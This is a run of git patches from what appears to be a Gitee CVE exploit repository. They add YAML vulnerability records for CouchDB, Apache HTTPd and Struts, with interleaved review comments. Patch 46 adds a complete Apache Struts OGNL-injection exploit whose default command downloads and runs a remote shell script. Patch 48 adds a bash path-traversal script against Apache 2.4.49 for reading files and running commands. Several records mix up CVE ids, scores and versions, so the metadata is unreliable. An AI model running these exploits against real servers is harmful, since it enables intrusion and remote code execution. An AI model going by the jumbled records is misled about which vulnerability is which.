+ - http://www.openwall.com/lists/oss-security/2022/05/09/3
+ - http://www.openwall.com/lists/oss-security/2022/05/09/4
+ - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
+ - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
+ - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
+ - https://www.openwall.com/lists/oss-security/2022/04/26/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-24706
+ cwe-id: CWE-1188
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 不安全的默认资源初始化
+ - 弱口令要求
+ - 远程代码执行
\ No newline at end of file
-- 
Gitee

From 0224658f029cfceb7331377e7549cf89975adec2 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:56:12 +0000
Subject: [PATCH 27/54] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml.

Signed-off-by: fanyunpeng
---
 cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
index 50fd5093..66d2294f 100644
--- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
@@ -1,10 +1,10 @@
-id: CVE-2022-24706
-source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+id: CVE-2021-41773
+source: https://www.exploit-db.com/exploits/50383
 info:
- name: Apache CouchDB 是一个面向文档的数据库管理系统。
+ name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。
 severity: critical
 description:
- 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
+ 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
 scope-of-influence:
 apache-CouchDB < 3.2.2
 reference:
-- 
Gitee

From 976832e463a54ca3b628e964ee51e9672dc2b88e Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 07:02:06 +0000
Subject: [PATCH 28/54] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml.

Signed-off-by: fanyunpeng
---
 .../2021/yaml/CVE-2021-41773.yaml | 18 +++++------------
 1 file changed, 5 insertions(+), 13 deletions(-)

diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
index 66d2294f..b9e4b71d 100644
--- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
@@ -6,22 +6,14 @@ info:
 description:
 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
 scope-of-influence:
- apache-CouchDB < 3.2.2
+ Apache HTTP Server = 2.4.49
 reference:
- - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
- - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
- - http://www.openwall.com/lists/oss-security/2022/04/26/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/2
- - http://www.openwall.com/lists/oss-security/2022/05/09/3
- - http://www.openwall.com/lists/oss-security/2022/05/09/4
- - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
- - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
- - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
- - https://www.openwall.com/lists/oss-security/2022/04/26/1
+ - https://apache.org/
+ - https://www.exploit-db.com/exploits/50383
+ - https://blog.csdn.net/qq_48985780/article/details/120973100
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
+ cvss-score: 4.3
 cve-id: CVE-2022-24706
 cwe-id: CWE-1188
 cnvd-id: None
-- 
Gitee

From e23a8933856f4f0967c5cd152f9d8ffab6bbb2d5 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 07:10:33 +0000
Subject: [PATCH 29/54] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml.

Signed-off-by: fanyunpeng
---
 .../2021/yaml/CVE-2021-41773.yaml | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
index b9e4b71d..420c8e1a 100644
--- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
@@ -11,14 +11,17 @@ info: - https://apache.org/ - https://www.exploit-db.com/exploits/50383 - https://blog.csdn.net/qq_48985780/article/details/120973100 + - https://www.oracle.com/security-alerts/cpujan2022.html + - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html + - http://www.openwall.com/lists/oss-security/2021/10/08/1 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 4.3 - cve-id: CVE-2022-24706 - cwe-id: CWE-1188 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-41773 + cwe-id: CWE-22 cnvd-id: None kve-id: None tags: - - 不安全的默认资源初始化 - - 弱口令要求 - - 远程代码执行 \ No newline at end of file + - Apache HTTP Serve + - 路径穿越 + - 任意文件读取 -- Gitee From 033e518031b80b4f63df924637cd64d59e812c27 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:16:37 +0000 Subject: [PATCH 30/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/yaml/.keep diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From c0255b9c95a4701388cb234e7b1682cde752765b Mon Sep 17 00:00:00 2001 
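Review bot: The `severity: critical` field (context above this hunk, visible in the earlier hunk of this file) no longer matches the new `cvss-score: 7.5`, which CVSS v3.1 rates as High (7.0–8.9); it should become `severity: high` or the score should be revisited. The new tag `- Apache HTTP Serve` is missing the final letter and should read `- Apache HTTP Server`. The description still states that arbitrary code execution is possible when CGI/cgid is enabled, while the new vector `C:H/I:N/A:N` records a confidentiality-only impact, so one of the two should be reconciled or the RCE sentence qualified. Note that this file is deleted again later in the series (PATCH 53), so the fix only matters if the file is kept.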
From: fanyunpeng Date: Thu, 16 Mar 2023 07:28:42 +0000 Subject: [PATCH 31/54] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/apache-?= =?UTF-8?q?HTTP=20Server/2021=20=E4=B8=BA=20cve/apache-HTTP=20Server/2019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../{2021 => 2019}/CVE-2021-41773/CVE-2021-41773.sh | 0 cve/apache-HTTP Server/{2021 => 2019}/CVE-2021-41773/README.md | 0 cve/apache-HTTP Server/{2021 => 2019}/yaml/CVE-2021-41773.yaml | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename cve/apache-HTTP Server/{2021 => 2019}/CVE-2021-41773/CVE-2021-41773.sh (100%) rename cve/apache-HTTP Server/{2021 => 2019}/CVE-2021-41773/README.md (100%) rename cve/apache-HTTP Server/{2021 => 2019}/yaml/CVE-2021-41773.yaml (100%) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh similarity index 100% rename from cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh rename to cve/apache-HTTP Server/2019/CVE-2021-41773/CVE-2021-41773.sh diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2019/CVE-2021-41773/README.md similarity index 100% rename from cve/apache-HTTP Server/2021/CVE-2021-41773/README.md rename to cve/apache-HTTP Server/2019/CVE-2021-41773/README.md diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml rename to cve/apache-HTTP Server/2019/yaml/CVE-2021-41773.yaml -- Gitee From 3baf25c017ef559561d22630315896231e9e2105 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:30:15 +0000 Subject: [PATCH 32/54] add cve/apache-Struts. Signed-off-by: fanyunpeng --- cve/apache-Struts | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts 
diff --git a/cve/apache-Struts b/cve/apache-Struts new file mode 100644 index 00000000..e69de29b -- Gitee From f06841a36b64e308e30b56018085dfe4e20c227b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:30:23 +0000 Subject: [PATCH 33/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts diff --git a/cve/apache-Struts b/cve/apache-Struts deleted file mode 100644 index e69de29b..00000000 -- Gitee From fdf6755df25f66931206dacae20e44a64886a157 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:30:34 +0000 Subject: [PATCH 34/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-Struts?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3d6d030f3adf68a0004164971c8ed6b6b94b31f6 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:31:10 +0000 Subject: [PATCH 35/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e1e2b851f830910188e6980bd567f708b885ea58 Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 07:31:35 +0000 Subject: [PATCH 36/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 07512f6c3f28da06f22e750b70c99fe298100f99 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:31:46 +0000 Subject: [PATCH 37/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/.keep diff --git a/cve/apache-Struts/.keep b/cve/apache-Struts/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 148d51a09e8cad2174db022ea26f4ef12045c269 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:04 +0000 Subject: [PATCH 38/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6e3d27828b5b81d7173bba34b6620dfc0c7ba66d Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:27 +0000 Subject: [PATCH 39/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-0230?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6395950469b24b6a362414f60109c9f328545db4 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:35 +0000 Subject: [PATCH 40/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep b/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From df97b3e50891123cb39cf71049a954fcb1a0a504 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:32:55 +0000 Subject: [PATCH 41/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/CVE-2019-0230/.keep b/cve/apache-Struts/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 762792219c84ace85cd1d612c60df1df0d88feea Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 07:33:09 +0000 Subject: [PATCH 42/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 65fd595c5ca933fa24fea4b01648bbef0c53e646 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:33:32 +0000 Subject: [PATCH 43/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2019/yaml/.keep diff --git a/cve/apache-Struts/2019/yaml/.keep b/cve/apache-Struts/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 466f934d816f6fff30780f1ca221483e84601d27 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:33:43 +0000 Subject: [PATCH 44/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/.keep diff --git a/cve/apache-Struts/2019/.keep b/cve/apache-Struts/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 4a9afee961d43128a1fda3047c74a37dab18787e Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 07:35:13 +0000 Subject: [PATCH 45/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/CVE-2019-0230/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep b/cve/apache-Struts/2019/CVE-2019-0230/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e32332b79ca0f793ceb583c551217272253f7699 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:35:40 +0000 Subject: [PATCH 46/54] Poc Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/CVE-2019-0230.py | 163 ++++++++++++++++++ 1 file changed, 163 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py new file mode 100644 index 00000000..1551ebac --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py 
@@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." 
\ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', 
action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file -- Gitee From 59e3d7ee18872df945d5c863b20ac6e5de7fa92e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:35:45 +0000 Subject: [PATCH 47/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/CVE-2019-0230/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/CVE-2019-0230/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2019/CVE-2019-0230/.keep diff --git a/cve/apache-Struts/2019/CVE-2019-0230/.keep b/cve/apache-Struts/2019/CVE-2019-0230/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 57b19b974e6e9f89f19480de5b1d260041bce0c9 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:39:14 +0000 Subject: [PATCH 48/54] add cve/apache-Struts/2019/CVE-2019-0230/README.md. Signed-off-by: fanyunpeng --- .../2019/CVE-2019-0230/README.md | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cve/apache-Struts/2019/CVE-2019-0230/README.md 
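Review bot: The `-debug` option is declared with `action='store'` and `default=False`, so any value given on the command line (including `-debug False`) is a non-empty string and enables debugging; the intended form is `parser.add_argument('-debug', action='store_true', help='Enable debugging')`, with `stdout.write` then printing a real boolean. The parser description names `CVE-2020-0230` while the file name, header comment and README all say CVE-2019-0230. `self.timeout = 0.5` is assigned in `__init__` but never passed to `session.get`/`session.post`, so the requests run without a timeout; add `timeout=self.timeout` to both calls or drop the attribute. If the `+` characters inside `'curl --insecure -sv +https://...'`, `'CVE-2020-0230 Struts +2 exploit'`, `'Target +address: ...'` and `"(#p=new +java.lang...` are diff markers rather than file content, those quoted literals are split across physical lines and the `stderr.write(...)` under `except Exception as error:` sits at column 0, so the committed file would not parse — this looks like line-wrap damage from the exploit-db text and should be checked before the file is kept.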
diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md new file mode 100644 index 00000000..827fdd49 --- /dev/null +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -0,0 +1,25 @@ +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +``` +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +``` +# Usage +``` +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami +``` + -- Gitee From b8187eaf3ca32705399473a3e40ab2db0537d359 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:47:59 +0000 Subject: [PATCH 49/54] add cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml. Signed-off-by: fanyunpeng --- .../2019/yaml/CVE-2019-0230.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml new file mode 100644 index 00000000..c2ef97a2 --- /dev/null +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml 
@@ -0,0 +1,24 @@ +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 \ No newline at end of file -- Gitee From 049961afc304e20f6d4e52b78d3c0925e5c830ae Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:48:31 +0000 Subject: [PATCH 50/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/2019/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2019/yaml/.keep | 0 1 file changed, 0 